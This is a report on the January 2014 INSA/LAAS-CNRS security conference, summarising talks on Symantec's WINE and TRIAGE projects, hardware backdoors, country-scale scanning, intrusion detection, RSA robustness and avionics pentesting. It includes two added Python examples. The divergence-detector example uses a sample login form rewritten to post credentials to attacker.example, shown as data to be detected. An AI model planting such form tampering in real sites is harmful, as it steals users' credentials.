Report on the security conference INSA-2014
Date: January 27, 2014
The French engineering school INSA and the LAAS-CNRS research institute organized a one-day security conference in Toulouse on January 23rd, 2014. A set of well-known French and Belgian speakers were invited. Their talks were mostly oriented either towards research (topics such as big data, intrusion detection or cryptographic robustness) or towards highly technical subjects (such as hardware backdoors, mass scanning, or pen-testing of avionic devices).
We present below a quick report for this day. The presentation material will be available shortly on the conference website.
Security and Big Data Analytics
By: Marc Dacier (Symantec Research Lab)
The speaker presented 2 research projects of Symantec Research Lab: WINE and TRIAGE. Both continue work initiated within the European project WOMBAT, which we described in 2009 in 2 articles: The state-of-the-art for Honeypot systems and Report for the SSTIC 2009 conference.
WINE (Worldwide Intelligence Network Environment) is a platform available to researchers upon request. It provides real data sets collected by Symantec from various security sensors, and ensures that these datasets are properly archived and can be replayed. The objective of this project is to provide a "scientific" environment to conduct experiments under controlled conditions. A description of the WINE platform is available here: www.symantec.com/WINE
TRIAGE is a data-mining technique used to identify similarities within a dataset. For example, when applied to a dataset of malicious emails, TRIAGE is able to identify all emails belonging to the same attack campaign and to describe how the campaign evolved (by showing the successive changes that occurred, such as changes in the email subjects or in the sites relaying the attacks, etc.). The TRIAGE method uses similarity search techniques (such as the Choquet integral) to identify MDCs (Multi-Dimensional Clusters) in the dataset. MDC visualization is then done using www.vis-sense.eu (a European project on data visualization). A more complete description of TRIAGE by Symantec (with an example of MDC visualization) is available here.
More on WINE and TRIAGE: http://seminaire-dga.gforge.inria.fr/2012/20130607-FredHollowood.pdf
Cyber-defense and hardware security: how far should we go?
By: Loic Duflot (Manager of the « Sous-direction Expertise » at the French ANSSI gov-agency)
After a short presentation on the ANSSI, the speaker used a series of examples to demonstrate that there are many topics to explore in the field of hardware security and hardware level backdoors:
- At the BIOS level, it is possible for example to develop a rootkit exploiting the SMM (System Management Mode) feature of Intel processors. A Cert-IST article released in 2009 details this further.
- On some network cards, it was possible to install a backdoor by exploiting, via RMCP (Remote Management and Control Protocol), a weakness in the implementation of ASF (Alert Standard Format). An ANSSI article released in 2010 details this further.
- What are the undocumented x86 Intel "op-codes" for? Are they related to a backdoor?
- Can we trust a USB device? The USB standard is generic, and a purpose-built USB device could masquerade as any type of USB device. It can try that way to trigger unexpected conditions that cause faults in the USB driver of the host.
Experience shows that until recently, hardware components have mostly been designed without taking possible attacks into account, and few defenses have been put in place. This opens a wide field of insecurity for all this equipment. The speaker concluded his presentation by recommending:
- To disable all unnecessary features (e.g. in the BIOS setup),
- To integrate security in the design of new hardware components.
Recon phase for cyber-attacks: what can be found on the Internet?
By: Frédéric Raynal (Founder of QuarksLab company)
The speaker presented an internal project by QuarksLab, which aims at performing large-scale scans to build a database containing information about all the computers found in a country or a large company.
The approach to achieve this is to:
- First identify all IP addresses belonging to the targeted country using GeoIP (a worldwide geolocation database; the best known GeoIP service is www.maxmind.com).
- Then, scan IPs using Nmap and NSE scripts to get as much information as possible about each machine (open ports, service banners, etc ...).
- Finally, store all the gathered data in a MongoDB database.
The speaker explained the various aspects that led him to adopt this approach, and in particular:
- The choice to perform active scans rather than passive traffic capture to collect data,
- The requirement to not disrupt the scanned network,
- The choice of the tools used for collecting information,
- The storage of collected data,
- Performance.
In terms of performance, the speaker said that the scan of a whole country such as Luxembourg (1 million IPs), with 3 machines, and limited to the top 20 ports, requires about 12 hours. By comparison, the same type of scan, using the Amazon Cloud service with 80 virtual machines, could have been done in 45 minutes. It is possible to use faster scanners, such as masscan (see the "data-plane networking" section of our Brucon-2013 report) or zmap, but the flow of generated data and the consumed bandwidth then introduce nontrivial problems.
The speaker mentioned several other similar works: Rapid7, Internet Census 2012, Shodan, or even the LHKF project (Low Hanging Kiwi Fruits, see this presentation from Hack.Lu-2011). Finally, he mentioned a U.S. company (Endgame System) which, according to secret documents stolen from HBGary, sells the same kind of service to U.S. government agencies (see this article from the website Risky.biz for more details).
New developments for Intrusion Detection?
By: Ludovic Mé (Research supervisor at Supelec/INRIA/CNRS)
The speaker first made a brief recap on the general principles driving intrusion detection. He explained in particular:
- 2 types of solution: the first one is based on attack scenario analysis and signatures to detect them, and the second one is based on behavioral analysis. Today most of the IDS products adopt the first approach.
- 2 properties used to evaluate IDS effectiveness: reliability (no false negative) and relevance (no false positives).
He then noted the difficulty of obtaining good results with current IDS. This "failure" is due in particular to a statistical phenomenon known as the "base-rate fallacy". This leads to a situation where an IDS with a theoretical detection rate of 90% will in practice see 92% of its alarms turn out to be false.
To improve IDS, two possible approaches were considered:
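The base-rate fallacy mentioned above, worked out with Bayes' theorem as an added example (not part of the talk). The 90% detection rate is the figure quoted by the speaker; the intrusion base rate and the per-event false-positive rate are assumed values chosen to show how a 90% detector ends up with roughly 92% false alarms, and the two metrics returned correspond to the "reliability" and "relevance" properties defined earlier.

```python
# Added example: the base-rate fallacy for an IDS, via Bayes' theorem.
# The 90% detection rate is the figure quoted in the talk; the intrusion
# base rate and the per-event false-positive rate are ASSUMED values.

def alarm_breakdown(detection_rate, false_positive_rate, base_rate):
    """Per-event probabilities for an IDS.

    detection_rate      P(alarm | intrusion)     -> the talk's "reliability"
    false_positive_rate P(alarm | no intrusion)
    base_rate           P(intrusion) for one observed event
    Returns "relevance" P(intrusion | alarm) and the share of alarms that are false.
    """
    true_alarms = detection_rate * base_rate
    false_alarms = false_positive_rate * (1.0 - base_rate)
    total_alarms = true_alarms + false_alarms
    return {
        "reliability": detection_rate,
        "relevance": true_alarms / total_alarms,
        "false_alarm_share": false_alarms / total_alarms,
        "missed_intrusion_rate": (1.0 - detection_rate) * base_rate,
    }


def max_fp_rate_for_relevance(detection_rate, base_rate, target_relevance):
    """Largest per-event false-positive rate that still keeps
    P(intrusion | alarm) at target_relevance (solve TP / (TP + FP) for FP)."""
    true_alarms = detection_rate * base_rate
    return true_alarms * (1.0 - target_relevance) / (target_relevance * (1.0 - base_rate))


if __name__ == "__main__":
    # ASSUMED: 1 intrusion per 10,000 events, 1 false alarm per 1,000 benign events
    r = alarm_breakdown(0.90, 1e-3, 1e-4)
    print(f"relevance {r['relevance']:.1%}, false alarms {r['false_alarm_share']:.1%}")
    fp = max_fp_rate_for_relevance(0.90, 1e-4, 0.5)
    print(f"FP rate needed for half of the alarms to be real: {fp:.2e}")
```

With these assumed parameters about 8% of alarms are real; the second function shows the false-positive rate has to fall to the order of the base rate itself before half of the alarms can be trusted.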
- Reprocess the generated alarms to eliminate false positives. The technique here is essentially based on correlation: if several related alarms are generated, then there is a high probability that an incident actually happened.
- Generate better alarms.
For this latter approach, the speaker presented a list of ideas and exposed in more details two of them:
- Take into account the security policy of the company. Most IDS today perform detection without any knowledge of the security policy of the company where they run, and taking this policy into account should greatly enhance IDS performance. The project www.blare-ids.org is an example of such an IDS.
- Incorporate techniques derived from safety science, for example the "functional diversification" safety concept. In this concept, several independent devices perform the same task in parallel: if one of the devices produces a different result, this device is considered faulty and an alarm is triggered. Using this as a model, one could detect intrusions on a website by sending user requests in parallel (redundantly) to several independent web servers: if one of these web servers behaves differently, it means that it has been compromised.
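The functional-diversification check sketched in the last item, as an added example that is not from the talk: the same request is answered by several independent servers, responses are normalised and fingerprinted, and a server that disagrees with the majority is flagged. Server names and responses are constructed sample data.

```python
# Added example (not from the talk): "functional diversification" applied to
# a web front end. A server whose answer differs from the majority is flagged.
# Server names and responses below are CONSTRUCTED sample data.
import hashlib
from collections import Counter

def fingerprint(status, body):
    """Canonical fingerprint of a response. All whitespace is stripped so that
    harmless formatting differences between independent implementations do not
    count as divergence (tune this normalisation to the real application)."""
    canonical = f"{status}|{''.join(body.split()).lower()}"
    return hashlib.sha256(canonical.encode()).hexdigest()

def detect_divergence(responses):
    """Majority vote over {server: (status, body)} for one request.
    Returns the consensus fingerprint and the servers that deviate from it;
    with no strict majority every server is treated as suspect."""
    fps = {srv: fingerprint(*resp) for srv, resp in responses.items()}
    (majority, votes), = Counter(fps.values()).most_common(1)
    if votes <= len(fps) / 2:
        return {"consensus": None, "suspect": sorted(fps)}
    return {"consensus": majority,
            "suspect": sorted(s for s, fp in fps.items() if fp != majority)}

# Constructed sample: three diverse servers answer the same GET /login; on
# web-c the form has been altered to post the credentials elsewhere.
SAMPLE = {
    "web-a": (200, "<form action='/login'>  <input name='user'> </form>"),
    "web-b": (200, "<form action='/login'><input name='user'></form>"),
    "web-c": (200, "<form action='http://attacker.example/login'><input name='user'></form>"),
}

if __name__ == "__main__":
    print(detect_divergence(SAMPLE))
```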
In conclusion, the speaker gave a series of recommendations to develop new approaches for IDS:
- Do not make assumptions (does this imply a behavioral approach?),
- Specialize and multiply detectors (avoid “one-size-fits-all” solutions),
- Do not limit IDS to Network-IDS (use Host-IDS as well),
- Take the context into account to make better correlations.
What would happen if cryptography stopped working ...
By: Jean-Jacques Quisquater (Cryptographer, Professor Emeritus of the Catholic University of Louvain)
Jean-Jacques Quisquater is a world-renowned expert in cryptography. The purpose of the presentation was to ask whether the RSA algorithm had been broken. After listening to his brilliant presentation, we must admit that real doubts exist.
First, he recalled that the robustness of the RSA algorithm (invented in 1977) relies on the difficulty of factoring large numbers. But there are several examples in history where mathematicians were able to factor very large numbers (in 1643 Fermat factored a Mersenne number, and at the end of the 19th century several scientists factored Jevons' number), and nobody knows the method they used. It is therefore possible that a forgotten (or still undiscovered) mathematical method exists to break RSA. If such a discovery ever happened, the consequences would be catastrophic because the RSA algorithm is used everywhere in security solutions.
The assumption that a method for breaking RSA might exist is obviously taken very seriously. For instance, the U.S. government organized a closed seminar in January 2013, entitled "The end of RSA" (which the speaker attended), intended to provide recommendations to the DoD to prepare for this eventuality. The slides for this event are available on the CATACRYPT 2013 website.
Research and security pentests on sensitive industrial technologies
By: Stéphane Duverger and Benoît Camredon (Airbus Group - Innovation Works)
The speakers gave the audience feedback about intrusive audits they have performed on avionics products. One of the main difficulties they encountered was that the audited hardware was very exotic:
- Non-standard connectors,
- Proprietary protocols,
- Specific architectures and OS.
A huge effort was then needed to understand how the equipment works (a Google search is very unlikely to provide an answer here!) and to find similarities with known IT systems and ideas for possible attacks.
Another difficulty was the limited availability of the audited equipment. It is often only available on a test bench, with a strict schedule for the interventions of all the specialists. Also, the test bench sometimes provides no tools adapted to pen-tester needs (such as execution traces), and it is often difficult to verify whether the attack that was tested produced a significant result.
Conclusion
This conference day for both students and industry professionals was a first for the Toulouse INSA school. It was a real success, with a set of very high quality presentations throughout the day. These presentations addressed both research topics and highly technical subjects; this mix was ideal ground for sharing ideas among attendees who were academics, students and professionals.